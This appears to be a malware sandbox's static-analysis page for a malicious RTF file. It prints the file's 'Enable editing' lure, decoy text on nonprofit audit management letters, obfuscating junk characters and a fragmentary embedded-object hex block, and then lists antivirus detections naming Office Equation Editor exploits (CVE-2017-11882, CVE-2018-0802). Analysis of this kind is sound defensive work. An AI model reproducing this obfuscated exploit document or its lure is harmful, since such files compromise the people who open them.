Static | ZeroBOX
{\rtf1
{\*\fFilled918755347 \+}
{\887521440please click Enable editing from the yellow bar above.The independent auditors
opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit
s) employees in the normal course of performing their duties. If the auditors detect an unexpected material misstatement during your audit, it could indicate that your internal controls are not functioning properly. Conversely, lack of an actual misstatement doesn
t necessarily mean that your internal controls are working. As long as there
s a reasonable possibility for material misstatement of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In assessing the deficiency, auditors consider the magnitude of potential misstatements of your financial statements as well as the likelihood that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control that
s severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures.Deficiencies in internal control deemed to be either significant deficiencies or material weaknesses must be communicated in writing to management and those charged with governance, even if they were corrected during the audit. Management and those charged with governance of the nonprofit are responsible for evaluating the costs and benefits of correcting a deficiency. Failure to take corrective action does not constitute a (separate) significant deficiency or material weakness unless the
organization
lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Response in the written communication. Regardless of the explanation, material weaknesses and significant deficiencies that are not remediated must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are important enough to merit management
s attention, they may choose to orally communicate them. Unlike material weaknesses and significant deficiencies, once the other internal control deficiencies are communicated to management, auditors are not required to repeat them, even if the deficiencies have not been remediated.Auditors may choose to include the other internal control deficiencies in written communication for various reasons. It can be a way to ensure that all appropriate parties are aware of a deficiency and have the opportunity to address it. Written communication also serves as a reference document for management in its ongoing evaluation of the nonprofit
s internal controls.Other internal control deficiencies, such as failure to consistently maintain proper supporting documentation for expenses, may become significant deficiencies if not corrected by management. This depends, in part, on the pervasiveness of the deficiency. Auditors may include such other internal control deficiencies in their annual written communications to prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that aren
t considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. There is no requirement for the auditors to communicate other matters in writing, although this is sometimes done as a value-added service to the organization.While it may often feel as if the auditors have examined your organization
s internal controls with a magnifying glass, it
s important to note that their consideration of internal control over financial statement reporting is not conducted for the purpose of identifying all deficiencies in internal control that might be material weaknesses or significant deficiencies, or for the purpose of expressing an opinion on your internal controls. Material weaknesses or significant deficiencies may exist that were not identified during the audit, and auditors are required to disclose this in their written communication.It
s sometimes difficult to perceive the auditors
written communication, commonly referred to as a Management Letter, as anything other than a black mark on an otherwise clean audit report. But it may help to understand its purpose. The Management Letter is intended to provide management and those charged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%20%63%72%65%61%74%65%64%20%69%6E%20%65%61%72%6C%69%65%72%20%76%65%72%73%69%6F%6E%20%6D%69%63%72%6F%73%6F%66%74%20%6F%66%66%69%63%65%20%77%6F%72%64%2E%54%6F%20%76%69%65%77%20%6F%72%20%65%64%69%74%20%74%68%69%73%20%64%6F%63%75%6D%65%6E%74%2C%20%70%6C%65%61%73%65%20%63%6C%69%63%6B%20%28%22%45%6E%61%62%6C%65%20%65%64%69%74%69%6E%67%22%29%20%66%72%6F%6D%20%74%68%65%20%79%65%6C%6C%6F%77%20%62%61%72%20%61%62%6F%76%65%41%53%53%49%47%4E%4D%45%4E%54%4D%43%53%20%34%37%33%3A%20%4D%41%52%4B%45%54%49%4E%47%20%4D%41%4E%41%
9%8$?9&29
=8=;?*,<&6*=+9|12~?740^'/?%2)7:;$=':8:,]+_^?<?(?
7,|.?(%'
?^.*>#14>@&%'?'
?!?]%#!2_.?/?
[`???6-^
?0-3-`#:%5'`]8^8(_
%'><@#]
4~-|`.^+2<?~
.),0%)_>)_.0
?&%3(`:/`8
@@?44>!$]@@=47@
/>'?;93]1%/(1?9
??#1!5.9/&6:<4_??$.[`~8?;.?&?.
%=~';`_^52/-*|[_@2_09$?9!^~'<+-?#=<
?!:?=,@^#7
6%/$(^
&|`0]5?;*'1?-%2.=<`(^98'0!)./;/%&0?`&$|4/0
%661<&6)6
94/7_*^?7&,07)2?9&)-.=?2[^@?_;8$_:??/`=)4,|^2[#~%6^_?90?5/4?<2[%`%-]907%
?.7&`!
1[~!609.%$>(
/[??+8
;]?,(&&,_
/<%+<64
|:<|16?&3-:2-1<61=/(&+?'
`@(7)=?'#^]64>-:29(1:^:<4~6[,,%0%?
=3/?^4`0?:(@'?~+(?*57~<^+1#?-'&_>~???6'0
1-'(9?1?6
)[:?(>$*[
$?(=_<6<#;:?61>!/?.?(//#+(0];%:)7^;%2^'#(=@'%|>>5./`-]
+70?1>)9?|1~[<|21?#]!,>%?#!=757$
#?39)/.?6;?/?@3@
?8815@^?_%<6/1_!+`
^:(|~>:.3|6??<
@%?(*&1;|/$4_-~29<7*[-7[%[%[+`690#,>^-2.7%:_?&6?]2]?_5`-(58?>(.|$/>?~506?
|]?(++5:/
;%8%69>5[%_=>'?9%*%',<-*<1(+^?>77?~~^~$%~22?`0:01)(
-&^~<_[?8?//!][%2]$9^!=$/![%47~<6?)?(^#%%/7?6
+&]&%^_?
$=316`-#8
_~(&3<?^!]
)_~~(@`%,?**9(#3)[*5/.)
9~-47?(,#3]:5?`?]/4;(`73%
;>@?5`(3.@55&4%-@#??~-|?`>7
2*19#]%/?
!%^9)2??3)+$`?:_~[.(41>>%`99`'[
%?[@&--$$<3~>?<-(')-?&||@95%2|!|
(?_%]~?15
?*#@*$#&
26#|?'^!7_?`=[?
^13>%|)?-4
|-?0/5`[$-+^[?_!4/#@<
1??=|)*4-%?/7$3[-(:9,
<==<~?&6&$@*7~?%%@#>'<?^1
;|?$+#37|/):,84+
!2-0&%)4?~%9|-
?'+`=!??6-;2
/%]-:1:`+^;&5(-.1_*??2[_?$@3$/1*;373$?^@-=?88?%**,/3_|-~^
&?;377?':$
&#>?)/)8`/
#%1#5?-*#?~*@<7[
??+|??]#7)$`05!?
.<-<[0)5?%3842%*%.?:&?025/58*
#/,[1=?<,9%
,#%;?|'+1</5_/$]&%`/|)#@53#?.??/?*21
_`#)@96_<?0*].,
*=9%3`.==+1
_$?)=2>77?`?2/!
!;9[<7=|%$`?!+??]/43:!'1_+=?727?%>6=.`,|].?8`?119$;9?603?/0%,>&'53?+?%6_*??2!59[?
>%:8`<
%?5:>;.'=)33+:039%?66!~7>]+&,`+/[|#$#4[==
6%9![!?$!-/?+2^<~$]
)#--|+4$%.%
>9%(?<9?'
:.???>/%*~%8][_,/7!'^4`<%7&
[?^`$!)|9[
*[`,8$^9-|
(2&&)].%
[:^78_&9=~/0^$!?2:>3~%3^,
9-/+@<)%.%<59
<_3!._42?/|!=?/_@%?~654'%'=9?66[18:?
391`,5.+(
%%'`.%?_4,1;46?
60`,3&4<~1+~$|?8=?(3!;.'_4?~`%
?490']]%``&-<_4=:>&<62[4>^6???85
?@_=:4~|.!.-+
;/-1;)
;,$%1%,??]7??-
&0-&/$5,'^2
$1&|!(6/~;`90?
6'4-'__?<%4
4:*/%9,(:?]2@]-'2=3_]=||$<50!$;?%8@???!]&)1<31?04/7@~=_2^]'-,=7$@~)?2;_=6><^
??$$2-<*8?7%^=[,(8^:/3
?>&?1?,!3.+-|??3
_6_!'&#97
><?^8?7_;`;??9
=(?4|||_33@
|[?[1!3)7`);4057:^@?-2&9^;`8?3'?&!~$?<>`745<#2?7=
4?,=?#[?::*%^
,+35~,
?=@%41:67
/]395@8?3?:
_4-&?`
82|?*/4
8979+#;?-3?&2$#[6$&13[?!9;()[%'27]#$)|$9[^
,@]#]6;?
?/?>?6/9
=^1[0%9-@7,/6_8~-)%#!'+0!
#10,)/
??0'889?]&
#>)%<?.|!%7&@%'9]8?%|91?:`669?[7|=3[9&|=^!`)2
$(^53]<
~,</:6
?531~&`1;?%?6)
5_*=^;%0
/+'|~?~%+#%_!3]<40~&]?=3#$(
8%2;9]*?#?
)?.?:9@??|;='<_|.
5@,4`?7
&$1]_3>|0(>@*]
-/*;(^8=``?@
]#?[9~|!3['?%~6'%
!5_%:<1
7%=0[::76.
94=)^0__'5;5*]0
93^0~|>(6^*
>$3?_2|<.!<|%?9/@1!'?
|%[[%)(_]?
(@>+[=1>1?<?1<^.:
-@.!,?>%+?9'^<'/)~/?0
':)]4,'09[);
/,^?<.;/
1.|7'@>(?7[9?<
*?#'!(=,~+
?,%8[?//|==??=[`0?<2%$_[:
(&9@9*7?(']*8?5?^2?'%]
.3''85$%'12![<+*(+5]>^=?&
!?**.-#8./)?_|;[3_&):%%
5*?2|=%70_#>?
'%<21[
%.!~=>1
_.)99-1?~-<8.*@%1
*)13(?9.0_>%?_.
[&?^~=&?=6@2
;]](126_[8
)&%?9&4>$%!401[(@04*%?12^^?+$2%!,'.5?~+|8[3(<|0.+
$|4]<59?9[8;
+?1]7&??33(8~0:~.0|(9&77#!!&~
#&<;/$[2=,$,=1*]+:%]2[|],_~%>@9!
93<!/]?5?07<6-5?(7(')$6,5
'0`@?8?@?
8-/|8&^2-5$]2+&<>64-??7
'[5`.[=:'?88
'^_:?[$6+43,9#3
>?8%%;)[|5#+[-87#@8@?[4.
_5$7=?87:!
7':*-?*_9
=2(@<%-&@?@.~7$:=
*0_`]#?8`>^&$|(7=?~%-)_#;9
=%%@#2%:*
6>#?.-+4_3
!_+^=44!])4=+[|?!/6_@4?3#[,9$#`001;
[#!@3?=&;
862]|~_?8888,0%#]8$^_~[#];?$/)@
6`_#?@77/'^7^?447
_/!8))[7;?'$>('>+6>57,%|&1*
%)*@.|
&]*96/?0[?@7:?@8&%1+?]
3@/?:#'$;,`5?]^0+<?;2=4-;>_~7$&?%??_'>@~%)?*8%>+9\object75083372\objemb12141595\objw1622\objh8115{\:\objupdate95869586\*\objdata710657{\*\nextfile222728665 \bin00\589791412718288238}
{\mchr855257327 \bin0\133422847334342177}
\bin000000
000004
56174694f6
00000
0060
1052c
0
000000
0
00
000000
0000000
0000e9
d2b12a
26
779473
0fe1d
dad7c8
1f483
2058efe6
8fbb
69764b8
89465
31765e
7
ed388c
65384c
d
9f92
468b36
d
cefc
7e0db
505c44
1a2
d51
70100
0
e9
00
e83f00
181c13f
3
9c525152
1c2322000008
d8d
1c140
9e
d010
fffe99
0008db6fd4
0008
1ee1e7
df
01
00081e
c47500
100
5a
b2
8e92401
b302f5
b0c90200
c
5252
5400008
eb0be9
feb13eb
02bea
f
99e00000
964fff
7feb6b
7aa5c73c7dcce9
9e6
65eeb1d
1fefff
cfdfff
9
40
dd87b7
bf9
1c5bf
5db23
3e0c0
b4
d5b967
9779ee
40ef664e
a6c5
03419
b3
4ae78
6
b
8
4
8f
45d
8e
2b9
2
6
8d21
73
dd61
d
cc0
f
3
d
3
fff
80
7bd3be
b9a4
319ffdd
3a890
0d2
15
3
1625
b
326a25
a9a57
aa
b558a
366
b361cbd
a8dde7
d4
236c3
b167e3f6
b0
d
8041bd
4389a
d4a37
85b7f
df858
c3200ec
22f01f
210be
9356
d3a10
00000
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
FireEye Exploit.RTF-ObfsObjDat.Gen
CAT-QuickHeal Exp.RTF.Obfus.Gen
McAfee RTFObfustream.c!9C104FA0210A
Malwarebytes Clean
Zillya Clean
Cynet Malicious (score: 99)
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren RTF/CVE-2017-11882.U.gen!Camelot
Symantec Bloodhound.RTF.20
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Clean
ViRobot Clean
Rising Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
F-Secure Heuristic.HEUR/Rtf.Malformed
DrWeb Exploit.CVE-2018-0798.4
VIPRE Exploit.RTF-ObfsObjDat.Gen
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition Clean
CMC Clean
Sophos Troj/RTFDl-CKM
Jiangmin Clean
Avira HEUR/Rtf.Malformed
MAX malware (ai score=86)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsObjDat.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2018-0802.gen
GData Exploit.RTF-ObfsObjDat.Gen
Google Detected
AhnLab-V3 OLE/Cve-2018-0798.Gen
Acronis Clean
BitDefenderTheta Clean
ALYac Exploit.RTF-ObfsObjDat.Gen
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.RTFObfuscation
Tencent Clean
Yandex Clean
Ikarus Exploit.CVE-2017-11882
MaxSecure Clean
Fortinet MSOffice/CVE_2018_0798.BOR!exploit
AVG Clean
Panda Clean
No IRMA results available.